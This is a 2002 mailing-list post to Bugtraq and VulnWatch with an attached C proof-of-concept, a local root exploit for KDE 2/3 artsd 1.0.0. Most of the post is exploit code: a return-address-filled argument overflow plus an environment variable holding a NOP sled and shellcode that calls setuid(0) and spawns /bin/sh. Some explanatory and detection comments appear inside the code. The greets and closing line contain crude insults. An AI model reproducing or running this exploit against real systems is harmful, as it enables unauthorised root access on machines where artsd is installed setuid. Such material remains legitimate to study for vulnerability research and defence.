KDE 2/3 artsd 1.0.0 local root exploit
Date: Mon, 29 Jul 2002 19:55:18 +0200
From: kokane <kokane@segfault.ch>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
Subject: KDE 2/3 artsd 1.0.0 local root exploit
------=_NextPart_000_000B_01C23739.DDFD1710
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
KDE 2/3 artsd 1.0.0 local root exploit PoC.
Cheers,
-kokane
------=_NextPart_000_000B_01C23739.DDFD1710
Content-Type: application/octet-stream;
name="bp_artsd.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="bp_artsd.c"
/* bp_artsd.c=0A=
* KDE 2/3 artsd 1.0.0 local root exploit=0A=
*=0A=
* credits: dvorak (helped me A LOT!@#), electronicsouls.org=0A=
*=0A=
* greets:=0A=
* bp members, dvorak, null, r00t, obz, rafa, nouse, module, phrack man, =0A=
* philer, preamble, eth1cal=0A=
* fucks to: fd0 (du schwule schlumpf)=0A=
*=0A=
* -kokane <kokane@segfault.ch>=0A=
*/=0A=
=0A=
#include <stdio.h>=0A=
#include <unistd.h>=0A=
#include <stdlib.h>=0A=
=0A=
/* Sizes of the two attacker-built strings assembled in main():=0A=
* BSIZE is the length of the "-m" argument (NUL included) and ESIZE=0A=
* the length of the single environment string. RET is a hard-coded=0A=
* stack address for one tested build only; argv[1] overrides it. */=0A=
#define BSIZE 1033=0A=
#define ESIZE 5120=0A=
#define RET 0xbffff808 /* tested on suse linux 8.0 */=0A=
=0A=
/* Payload that ends up at the tail of the environment string. The=0A=
* first three 8-byte stubs are labelled below; the remainder carries=0A=
* the embedded "/bin/sh" string and presumably exec's it. Where artsd=0A=
* is installed setuid root, a successful run therefore looks like the=0A=
* artsd process replacing itself with /bin/sh while keeping uid/gid 0,=0A=
* which is a process-tree pattern worth alerting on. */=0A=
unsigned char buttcode[] =3D=0A=
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" // alarm(0);=0A=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);=0A=
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);=0A=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"=0A=
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"=0A=
"\x80\xe8\xdc\xff\xff\xff/bin/sh";=0A=
=0A=
/* Launch the target with the two crafted strings: "-m" receives the=0A=
* address-filled buffer and the only environment entry is the nop=0A=
* sled plus payload. Nothing here escalates by itself; it presumably=0A=
* relies on the installed artsd being setuid root, so dropping that=0A=
* bit (or not installing artsd setuid at all) is the mitigation.=0A=
* Detection hint: an execve of this binary with a one-entry=0A=
* environment of roughly ESIZE bytes and a "-m" value of roughly=0A=
* BSIZE bytes of repeated pointer values is not a normal desktop=0A=
* start. The execve return is not checked, so a failed exec simply=0A=
* returns to main(). */=0A=
void anal(char *rets, char *evil) {=0A=
char * arg_[] =3D { "artsd", "-m", rets, 0 };=0A=
char * env_[] =3D { evil, 0 };=0A=
execve("/opt/kde3/bin/artsd", arg_, env_);=0A=
}=0A=
=0A=
/* Build both strings and hand them to anal().=0A=
* argv[1], when present, replaces RET (strtoul base 0, so a "0x"=0A=
* prefix is accepted). buf becomes BSIZE-1 bytes of the return=0A=
* address followed by a NUL; egg becomes ESIZE bytes of 0x90 with=0A=
* the payload copied to its very end and "UNF=3D" written over the=0A=
* first four bytes, i.e. one environment variable named UNF. */=0A=
int main(int argc, char **argv) {=0A=
char buf[BSIZE], egg[ESIZE];=0A=
unsigned long retaddr=3DRET;=0A=
int i;=0A=
=0A=
fprintf(stdout, "\n+ KDE 2/3 artsd 1.0.0 local root exploit =
(bp_artsd.c)\n+ by kokane/buttP!RATEZ\n");=0A=
=0A=
if (argc > 1)=0A=
retaddr =3D strtoul(argv[1], NULL, 0);=0A=
fprintf(stdout, "\n+ ret_addr: 0x%x\n\n", retaddr);=0A=
=0A=
/* fill our buffer with ret_addr's: one unsigned long per step from=0A=
* the top down; the last step (i of 4) writes buf[0..3]. The store=0A=
* assumes a 4-byte unsigned long, i.e. the 32-bit targets named=0A=
* above. */=0A=
for (i =3D BSIZE-1 ; i >=3D 4 ; i =3D i-4)=0A=
*(unsigned long *)&buf[i - 4] =3D retaddr;=0A=
=0A=
/* fill our evil environment variable with nops + shellcode: the copy=0A=
* runs backwards from the terminating NUL, so the payload occupies=0A=
* the last strlen(buttcode)+1 bytes of egg */=0A=
memset(egg, 0x90, sizeof(egg));=0A=
for (i =3D 0; i <=3D strlen(buttcode) ;i++)=0A=
egg[ESIZE - 1 - i] =3D buttcode[strlen(buttcode) - i];=0A=
/* turn the sled into "UNF" followed by the variable's value */=0A=
memcpy(egg,"UNF=3D",4);=0A=
=0A=
/* terminate both strings; egg's last byte is already NUL from the=0A=
* loop above, this just makes it explicit */=0A=
buf[BSIZE - 1] =3D '\0';=0A=
egg[ESIZE - 1] =3D '\0';=0A=
=0A=
anal(buf, egg);=0A=
return 0;=0A=
}=0A=
/* buttP!RATEZ - providing k-rad anal sex since 2001 */=0A=
------=_NextPart_000_000B_01C23739.DDFD1710--